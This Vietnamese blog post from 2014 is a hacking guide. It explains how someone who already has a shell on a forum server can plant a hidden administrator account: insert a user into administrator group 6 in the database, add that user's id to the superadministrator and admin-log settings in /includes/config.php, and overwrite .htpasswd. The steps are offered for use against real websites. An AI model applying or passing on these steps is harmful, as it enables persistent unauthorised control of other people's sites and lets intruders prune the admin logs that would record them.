Chủ Nhật, 23 tháng 11, 2014

Login Vào Admin Cp Khi Bị Giới Hạn Quyền Truy Cập

Thông thường khi hack web, việc có shell trên server là điều mà các hacker luôn mong muốn. Bởi khi có shell chúng ta sẽ có được thông tin về database...--> có được tài khoản Admin hoặc tạo thêm được tài khoản Admin quản trị website.

Ta sẽ không đề cập đến vấn đề chiếm quyền Admin hiện tại, mà ở đây, với 1 database chúng ta có thể tạo thêm user trong database, gán id group cho user đó nằm trong administrator group, mặc định của group này có id là 6.

Tuy nhiên, khi đã trong nhóm Administrator rồi nhưng chúng ta không thể đăng nhập được vào Admin CP, do đó cần phải thêm id của user đó vào file config. Mặc định file config.php được đặt tại
/includes/config.phpChúng ta cần sửa 3 thông số :
$config['SpecialUsers']['superadministrators'] = '1';$config['SpecialUsers']['canviewadminlog'] = '1';$config['SpecialUsers']['canpruneadminlog'] = '1';

Bạn hãy tạo thêm 1 nik name với id khác vd như abc với id là 123 chẳng hạn. Sau đó thêm vào :

$config['SpecialUsers']['superadministrators'] = '1,123';$config['SpecialUsers']['canviewadminlog'] = '1,123';$config['SpecialUsers']['canpruneadminlog'] = '1,123';

Khi đó, bạn sẽ login được vào AdminCP. Nếu trường hợp Admincp bị đặt htaccess thì chúng ta đổi password trong file .htpasswd.

Không có nhận xét nào:

Đăng nhận xét